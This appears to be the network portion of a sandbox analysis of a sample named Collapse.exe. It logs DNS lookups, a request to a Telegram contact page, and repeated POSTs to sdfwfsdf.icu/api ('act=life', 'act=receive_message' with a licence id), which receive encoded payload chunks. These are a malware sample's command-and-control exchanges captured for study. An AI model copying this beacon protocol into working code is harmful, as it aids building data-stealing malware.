                                          Mar 5, 2025 14:57:33.039612055 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.039638042 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.348548889 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.348608017 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.348687887 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.348998070 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.349013090 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.820168018 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.820271015 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.821466923 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.821480989 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.821712971 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.822783947 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.823493958 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.823527098 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.823633909 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.823668957 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.823772907 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.823798895 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.823915958 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.823951006 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.824074984 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.824105978 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.824250937 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.824276924 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.824287891 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.824301958 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.824430943 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.824455023 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.824476957 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.824604988 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.824630022 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.834372044 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.834598064 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.834628105 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.834650993 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.834697962 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:33.834830046 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:36.719763994 CET44349722188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:36.719984055 CET49722443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:36.725373983 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:36.725399017 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:36.725474119 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:36.725769997 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:36.725783110 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:37.205539942 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:37.205617905 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:37.206996918 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:37.207010984 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:37.207237959 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:37.208543062 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:37.208564043 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:37.208609104 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257395029 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257458925 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257503986 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257550001 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257600069 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.257611990 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257657051 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257672071 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.257678032 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257746935 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257812023 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.257817984 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.257904053 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.258013964 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.258090019 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.258184910 CET44349728188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:39.258291960 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.258291960 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.258291960 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.258346081 CET49728443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:39.258354902 CET44349728188.114.97.3192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 5, 2025 14:57:18.551278114 CET5460853192.168.2.51.1.1.1
                                          Mar 5, 2025 14:57:18.558835030 CET53546081.1.1.1192.168.2.5
                                          Mar 5, 2025 14:57:19.487936974 CET5460553192.168.2.51.1.1.1
                                          Mar 5, 2025 14:57:19.505309105 CET53546051.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Mar 5, 2025 14:57:18.551278114 CET192.168.2.51.1.1.10x746fStandard query (0)t.meA (IP address)IN (0x0001)false
                                          Mar 5, 2025 14:57:19.487936974 CET192.168.2.51.1.1.10xe754Standard query (0)sdfwfsdf.icuA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Mar 5, 2025 14:57:18.558835030 CET1.1.1.1192.168.2.50x746fNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                          Mar 5, 2025 14:57:19.505309105 CET1.1.1.1192.168.2.50xe754No error (0)sdfwfsdf.icu188.114.97.3A (IP address)IN (0x0001)false
                                          Mar 5, 2025 14:57:19.505309105 CET1.1.1.1192.168.2.50xe754No error (0)sdfwfsdf.icu188.114.96.3A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • t.me
                                          • sdfwfsdf.icu

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549704149.154.167.994437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:19 UTC189OUTGET /kz_prokla1 HTTP/1.1
                                          Connection: Keep-Alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Host: t.me
                                          2025-03-05 13:57:19 UTC512INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Wed, 05 Mar 2025 13:57:19 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 12331
                                          Connection: close
                                          Set-Cookie: stel_ssid=7a4d5375dec834b5a3_16925268618763331742; expires=Thu, 06 Mar 2025 13:57:19 GMT; path=/; samesite=None; secure; HttpOnly
                                          Pragma: no-cache
                                          Cache-control: no-store
                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                          Strict-Transport-Security: max-age=35768000
                                          2025-03-05 13:57:19 UTC12331INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 7a 5f 70 72 6f 6b 6c 61 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @kz_prokla1</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549705188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:20 UTC259OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 8
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                          Data Ascii: act=life
                                          2025-03-05 13:57:22 UTC819INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CpWvoL%2F90V1ssgaBM9Hhhj1EBDHqMgaNhFVFnYTblix%2Fbsmpc8nt11MYRv%2BHLnEIEM11%2FyS48bBK%2F%2FfYSL9CO1%2Bzo%2BmKVqFj4Zqotkm9PijqWu9RZivj5JEZZmxa%2FNk%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f308b3a7d02-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=1978&rtt_var=819&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=903&delivery_rate=1275109&cwnd=208&unsent_bytes=0&cid=53ec5d6fe1208d41&ts=2459&x=0"
                                          2025-03-05 13:57:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                          Data Ascii: 2ok
                                          2025-03-05 13:57:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549712188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:22 UTC260OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 55
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:22 UTC55OUTData Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 26 6a 3d
                                          Data Ascii: act=receive_message&ver=4.0&lid=LPnhqo--qnhtzqcrazyg&j=
                                          2025-03-05 13:57:23 UTC806INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIIS2A3p4oas26swk2lt6X3xeUq%2BJKuoWti0hYsrjNWTLLVWeG%2BUIlr8dOZBK5nQMX8%2B7yiK2OxltozC3zeY1J9Gm357z5v4eXns9rU52p5vV6T1jmmggPecfedbCa4%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f430d8c0f95-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1684&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=951&delivery_rate=1676234&cwnd=169&unsent_bytes=0&cid=be5d2ca6dbab3c37&ts=574&x=0"
                                          2025-03-05 13:57:23 UTC563INData Raw: 63 32 39 0d 0a 66 33 6d 2b 59 47 6b 6b 70 7a 68 63 50 52 49 48 45 6d 79 76 5a 65 63 70 6a 69 4b 4f 39 67 35 41 59 4e 71 4e 51 55 67 39 30 4b 41 45 57 38 68 43 55 78 43 4c 47 69 39 59 4d 44 31 6d 48 74 6f 41 79 77 76 76 52 71 7a 4d 61 43 45 4d 71 65 68 74 61 6b 75 39 67 6b 55 66 33 77 77 61 51 59 73 61 4f 55 55 77 50 55 6b 58 6a 51 43 4a 43 37 51 41 36 35 78 73 49 51 79 34 37 43 6f 6e 54 62 7a 44 46 78 58 5a 43 41 78 48 77 31 6b 77 55 48 64 69 64 77 33 46 43 34 35 45 35 6b 2b 73 32 69 77 6c 47 76 69 33 59 77 56 59 70 4d 45 79 47 4d 30 4c 53 31 6d 4c 51 33 35 59 66 43 55 6f 54 73 34 41 68 55 58 6f 52 75 57 65 5a 69 67 45 75 65 6b 72 4f 46 53 32 79 42 63 62 32 67 6b 47 54 74 64 55 4f 6c 64 38 5a 48 30 4e 6a 55 6e 46 54 50 51 41 74 4e 51 2f 45 41 47 70 2f 6a
                                          Data Ascii: c29f3m+YGkkpzhcPRIHEmyvZecpjiKO9g5AYNqNQUg90KAEW8hCUxCLGi9YMD1mHtoAywvvRqzMaCEMqehtaku9gkUf3wwaQYsaOUUwPUkXjQCJC7QA65xsIQy47ConTbzDFxXZCAxHw1kwUHdidw3FC45E5k+s2iwlGvi3YwVYpMEyGM0LS1mLQ35YfCUoTs4AhUXoRuWeZigEuekrOFS2yBcb2gkGTtdUOld8ZH0NjUnFTPQAtNQ/EAGp/j
                                          2025-03-05 13:57:23 UTC1369INData Raw: 6b 42 42 55 6a 43 54 48 35 41 50 6e 77 77 43 63 46 48 33 51 76 69 52 65 4f 47 62 54 41 48 74 76 30 76 4c 31 6d 2f 77 52 4d 62 32 51 55 47 53 4d 4e 64 50 56 64 30 5a 48 34 43 78 77 53 42 53 4b 77 4f 72 4a 4e 30 59 6c 72 34 33 69 41 75 57 4b 44 42 45 31 76 44 54 42 49 47 77 6c 5a 2b 42 7a 42 76 64 67 50 45 44 49 4a 44 34 46 4c 6e 6d 32 38 72 42 62 37 6c 49 43 4a 56 74 4d 77 63 48 4e 6b 46 47 55 6a 4f 56 7a 31 56 64 69 55 2b 54 73 6f 66 78 52 4f 73 62 75 2b 46 65 68 41 42 71 66 35 6a 4e 52 47 72 67 68 6f 58 6e 46 70 4c 54 38 31 56 4d 31 4a 36 61 33 55 44 78 41 61 45 52 75 70 4c 37 5a 78 6b 4a 67 57 34 36 79 34 6c 55 62 4c 4d 46 52 37 59 43 41 49 47 69 78 6f 35 52 7a 41 39 4d 44 37 41 43 34 35 48 72 6e 58 76 6d 6d 49 6c 46 50 6a 77 62 54 4d 66 74 63 35 64 51
                                          Data Ascii: kBBUjCTH5APnwwCcFH3QviReOGbTAHtv0vL1m/wRMb2QUGSMNdPVd0ZH4CxwSBSKwOrJN0Ylr43iAuWKDBE1vDTBIGwlZ+BzBvdgPEDIJD4FLnm28rBb7lICJVtMwcHNkFGUjOVz1VdiU+TsofxROsbu+FehABqf5jNRGrghoXnFpLT81VM1J6a3UDxAaERupL7ZxkJgW46y4lUbLMFR7YCAIGixo5RzA9MD7AC45HrnXvmmIlFPjwbTMftc5dQ
                                          2025-03-05 13:57:23 UTC1188INData Raw: 55 77 46 77 73 56 54 41 72 4d 41 6e 56 52 39 30 4c 32 6c 44 37 68 58 70 67 4e 37 76 68 4c 53 31 4a 38 74 31 54 41 70 77 46 42 77 61 64 47 6a 56 66 66 47 4a 34 43 4d 6b 50 69 6b 54 6c 55 75 32 59 59 6a 41 46 75 4f 59 74 4a 56 4f 37 7a 78 6f 57 31 77 67 47 51 73 4a 62 66 68 45 77 59 6d 68 4f 6c 55 65 7a 57 2b 46 4d 77 70 39 67 4b 30 4b 6e 6f 54 70 71 57 4c 36 43 52 56 76 59 44 67 4e 4d 79 6c 4d 30 56 58 39 73 63 41 62 45 44 6f 5a 4c 34 45 62 74 6d 47 41 76 42 37 76 71 4c 69 39 66 76 73 55 61 47 70 78 4d 53 30 48 64 47 6d 59 66 51 47 68 38 42 63 46 46 73 45 6a 69 54 75 75 43 4c 44 31 4d 6f 61 38 6b 4a 68 2f 71 67 68 49 61 30 51 67 41 53 4d 6c 62 50 6c 74 7a 62 33 41 42 79 41 47 4e 51 75 78 53 36 35 74 74 49 77 6d 7a 34 69 30 76 58 72 66 46 58 56 57 63 42 52
                                          Data Ascii: UwFwsVTArMAnVR90L2lD7hXpgN7vhLS1J8t1TApwFBwadGjVffGJ4CMkPikTlUu2YYjAFuOYtJVO7zxoW1wgGQsJbfhEwYmhOlUezW+FMwp9gK0KnoTpqWL6CRVvYDgNMylM0VX9scAbEDoZL4EbtmGAvB7vqLi9fvsUaGpxMS0HdGmYfQGh8BcFFsEjiTuuCLD1Moa8kJh/qghIa0QgASMlbPltzb3AByAGNQuxS65ttIwmz4i0vXrfFXVWcBR
                                          2025-03-05 13:57:23 UTC1369INData Raw: 33 62 66 39 0d 0a 76 63 51 46 4e 77 42 48 51 62 61 46 43 63 66 64 32 6b 77 56 6f 30 4c 69 30 76 6a 54 4f 43 66 5a 43 4d 4f 74 75 67 6d 49 31 65 36 30 42 77 66 31 41 4d 46 53 63 52 65 4f 31 70 30 59 6e 51 49 77 6b 66 4c 43 2b 74 59 72 4d 77 73 44 53 57 4e 72 51 49 51 48 36 32 4d 42 46 76 62 44 6b 73 65 68 56 59 39 55 33 68 71 64 67 66 42 44 59 78 41 34 45 76 6f 6d 47 55 6e 42 4c 6e 71 4a 69 74 62 76 73 67 62 47 4e 38 4e 42 45 6e 4e 47 6e 41 66 64 33 30 77 56 6f 30 69 6b 6b 44 69 52 71 79 4c 49 6a 74 43 76 2b 4e 6a 63 68 2b 2b 79 78 73 64 32 51 34 4b 51 4d 31 66 4e 6c 74 78 59 33 59 4e 77 67 4f 41 53 75 4e 45 34 4a 70 6d 49 77 4f 30 35 43 77 68 57 76 4b 4d 58 52 7a 45 51 6c 4d 47 39 46 6b 6f 53 47 42 70 4d 42 47 44 48 73 56 4d 34 41 43 30 31 47 30 77 43 4c
                                          Data Ascii: 3bf9vcQFNwBHQbaFCcfd2kwVo0Li0vjTOCfZCMOtugmI1e60Bwf1AMFScReO1p0YnQIwkfLC+tYrMwsDSWNrQIQH62MBFvbDksehVY9U3hqdgfBDYxA4EvomGUnBLnqJitbvsgbGN8NBEnNGnAfd30wVo0ikkDiRqyLIjtCv+Njch++yxsd2Q4KQM1fNltxY3YNwgOASuNE4JpmIwO05CwhWvKMXRzEQlMG9FkoSGBpMBGDHsVM4AC01G0wCL
                                          2025-03-05 13:57:23 UTC1369INData Raw: 53 61 6d 43 41 6c 58 46 51 67 78 4b 68 51 4a 2b 58 48 74 75 64 41 37 42 42 34 46 47 37 46 4c 6a 6b 32 73 72 43 61 72 6c 4a 43 31 55 75 73 6b 53 48 63 34 4f 42 56 54 41 53 43 77 66 50 69 56 33 46 6f 31 66 78 58 33 72 55 50 79 58 4c 68 4d 55 75 2f 6b 6f 4a 31 50 79 33 56 4d 43 6e 41 55 48 42 70 30 61 4f 46 42 35 5a 6e 38 50 78 41 75 49 54 75 56 46 37 5a 4a 6f 4b 41 69 34 36 53 55 72 57 72 6a 42 48 42 48 56 42 51 4e 42 78 6b 68 2b 45 54 42 69 61 45 36 56 52 36 78 4d 2f 6b 37 38 31 48 4e 73 47 2f 6a 6f 4c 32 6f 48 38 73 59 58 46 4e 67 46 42 30 44 41 58 44 4e 65 66 32 52 77 41 63 6b 4d 6a 45 33 74 54 65 6d 5a 61 44 41 49 73 2b 41 76 49 31 4f 2f 67 6c 4e 62 32 78 70 4c 48 6f 56 72 4d 31 46 2b 59 6d 5a 4f 30 6b 6d 63 43 2b 74 4d 72 4d 77 73 49 77 36 33 37 43 77
                                          Data Ascii: SamCAlXFQgxKhQJ+XHtudA7BB4FG7FLjk2srCarlJC1UuskSHc4OBVTASCwfPiV3Fo1fxX3rUPyXLhMUu/koJ1Py3VMCnAUHBp0aOFB5Zn8PxAuITuVF7ZJoKAi46SUrWrjBHBHVBQNBxkh+ETBiaE6VR6xM/k781HNsG/joL2oH8sYXFNgFB0DAXDNef2RwAckMjE3tTemZaDAIs+AvI1O/glNb2xpLHoVrM1F+YmZO0kmcC+tMrMwsIw637Cw
                                          2025-03-05 13:57:23 UTC1369INData Raw: 46 30 63 78 45 4a 54 42 75 5a 4e 4b 46 56 33 61 57 59 46 7a 41 53 54 52 76 77 41 6f 74 52 39 4a 52 50 34 74 7a 55 36 53 4c 58 64 55 77 4b 63 42 51 63 47 6e 52 6f 34 56 6e 5a 69 64 67 44 66 41 6f 4e 45 34 30 6e 6c 6b 47 51 68 41 72 7a 72 4a 43 39 63 76 73 6b 61 47 4e 4d 47 41 6b 6a 4d 56 58 34 52 4d 47 4a 6f 54 70 56 48 70 46 44 76 54 4f 48 55 63 32 77 62 2b 4f 67 76 61 67 66 79 7a 68 4d 65 33 41 67 4e 51 73 42 63 4e 46 70 77 62 6e 4d 42 79 51 47 42 52 4f 78 4c 35 5a 56 71 4a 77 69 7a 36 53 34 70 57 62 53 43 55 31 76 62 47 6b 73 65 68 58 6f 6c 55 6e 78 69 4d 42 47 44 48 73 56 4d 34 41 43 30 31 47 63 75 42 72 2f 76 4c 69 6c 58 74 38 59 58 48 74 77 4b 47 55 37 46 58 53 78 4e 63 47 78 31 41 73 34 48 67 55 33 6c 52 75 2b 51 4c 47 78 43 76 2f 64 6a 63 68 2b 66
                                          Data Ascii: F0cxEJTBuZNKFV3aWYFzASTRvwAotR9JRP4tzU6SLXdUwKcBQcGnRo4VnZidgDfAoNE40nlkGQhArzrJC9cvskaGNMGAkjMVX4RMGJoTpVHpFDvTOHUc2wb+OgvagfyzhMe3AgNQsBcNFpwbnMByQGBROxL5ZVqJwiz6S4pWbSCU1vbGksehXolUnxiMBGDHsVM4AC01GcuBr/vLilXt8YXHtwKGU7FXSxNcGx1As4HgU3lRu+QLGxCv/djch+f
                                          2025-03-05 13:57:23 UTC1369INData Raw: 38 55 41 45 76 4a 53 77 41 66 4b 44 45 69 58 4a 39 56 31 31 53 73 58 39 50 61 4c 43 4e 43 34 4e 59 36 61 6b 6e 79 6d 6b 39 56 6e 42 42 4c 48 6f 55 64 50 55 31 69 59 33 4d 59 7a 6b 43 37 64 63 74 57 35 70 4e 38 4a 52 57 33 72 32 31 71 55 50 4b 61 4a 46 76 56 42 52 42 58 30 31 63 75 57 44 42 61 50 6b 37 56 52 39 30 4c 32 55 50 69 6d 6d 73 30 45 2f 58 49 4e 53 42 59 6f 73 55 4b 46 4a 78 4d 53 30 43 46 41 6d 30 52 4d 47 46 68 54 70 56 58 31 78 43 35 45 37 76 45 50 6a 31 4d 6f 61 38 31 61 67 66 67 6a 46 30 4a 6e 46 70 4c 41 63 5a 49 4c 46 6c 7a 63 33 4e 4a 38 7a 6d 69 55 65 46 47 2b 34 56 53 48 41 57 69 34 69 55 39 54 76 37 58 48 68 58 53 42 52 30 47 69 78 6f 78 48 79 68 63 4d 45 61 4e 4f 4d 73 4c 39 41 43 30 31 46 6b 68 44 4c 62 6f 4e 54 73 53 6c 64 67 51 48
                                          Data Ascii: 8UAEvJSwAfKDEiXJ9V11SsX9PaLCNC4NY6aknymk9VnBBLHoUdPU1iY3MYzkC7dctW5pN8JRW3r21qUPKaJFvVBRBX01cuWDBaPk7VR90L2UPimms0E/XINSBYosUKFJxMS0CFAm0RMGFhTpVX1xC5E7vEPj1Moa81agfgjF0JnFpLAcZILFlzc3NJ8zmiUeFG+4VSHAWi4iU9Tv7XHhXSBR0GixoxHyhcMEaNOMsL9AC01FkhDLboNTsSldgQH
                                          2025-03-05 13:57:23 UTC1369INData Raw: 64 69 56 49 39 52 57 70 62 54 69 58 42 41 59 4a 52 36 30 62 4b 74 43 78 73 51 72 65 76 65 78 4d 66 2b 6f 49 69 56 5a 77 61 53 78 36 46 62 7a 31 52 66 6d 4a 6d 48 34 41 76 70 6e 48 57 41 73 43 54 65 57 41 32 76 2f 38 79 49 56 4b 2b 67 6c 4e 62 32 6b 4a 54 46 6f 73 61 4f 6b 34 77 50 53 42 63 6c 6c 4c 57 48 4c 77 53 38 39 70 31 59 68 54 34 74 33 46 6b 48 36 43 43 52 56 75 62 41 52 6c 55 77 31 6b 6f 58 44 64 62 54 69 6e 44 41 49 52 64 2f 46 66 6a 71 6c 49 33 41 62 62 68 4a 44 78 4f 38 6f 78 64 46 4a 78 61 4d 67 61 4e 47 67 45 52 4d 48 30 77 56 6f 30 79 68 6b 58 69 52 2f 71 46 49 51 55 4d 76 2b 34 31 4f 6b 69 39 67 6c 4e 62 32 6b 4a 54 46 49 73 61 4f 6b 34 77 50 53 42 63 6c 6c 4c 57 48 4c 77 53 38 39 70 31 59 68 54 34 74 33 46 6b 48 36 43 43 52 56 75 62 41 52
                                          Data Ascii: diVI9RWpbTiXBAYJR60bKtCxsQrevexMf+oIiVZwaSx6Fbz1RfmJmH4AvpnHWAsCTeWA2v/8yIVK+glNb2kJTFosaOk4wPSBcllLWHLwS89p1YhT4t3FkH6CCRVubARlUw1koXDdbTinDAIRd/FfjqlI3AbbhJDxO8oxdFJxaMgaNGgERMH0wVo0yhkXiR/qFIQUMv+41Oki9glNb2kJTFIsaOk4wPSBcllLWHLwS89p1YhT4t3FkH6CCRVubAR
                                          2025-03-05 13:57:23 UTC1369INData Raw: 4d 68 38 6f 4a 58 45 45 33 51 71 4b 54 4b 42 48 39 70 4d 73 62 45 4b 32 72 33 74 71 58 72 6a 53 45 42 54 62 54 67 31 49 79 78 6f 68 45 57 6b 6c 5a 6b 36 56 56 4d 73 4c 2f 67 43 30 31 43 73 68 45 4b 72 70 49 44 78 63 39 66 77 6a 4e 73 34 46 47 30 57 48 61 7a 4e 62 5a 6e 42 7a 48 73 6f 35 75 32 62 2b 52 2f 79 58 4c 68 4d 55 75 2b 38 74 4c 52 2f 38 67 67 56 62 68 45 49 6d 56 4d 4a 4b 50 52 38 2b 4a 58 78 4f 6c 55 65 49 57 65 74 51 37 39 68 72 4f 41 58 34 38 47 30 7a 48 36 53 43 52 55 69 53 51 68 6b 47 6e 52 70 35 55 58 31 6b 63 77 44 4f 46 5a 64 4e 37 31 62 76 30 31 49 63 4c 36 72 6f 4d 79 6b 64 67 38 38 5a 44 63 6b 42 47 30 48 37 5a 42 4e 4e 64 33 56 7a 54 4f 45 41 69 45 66 53 66 74 75 46 61 7a 4a 41 6e 75 77 31 4b 52 2f 38 67 67 56 62 68 45 49 6d 56 4d 4a
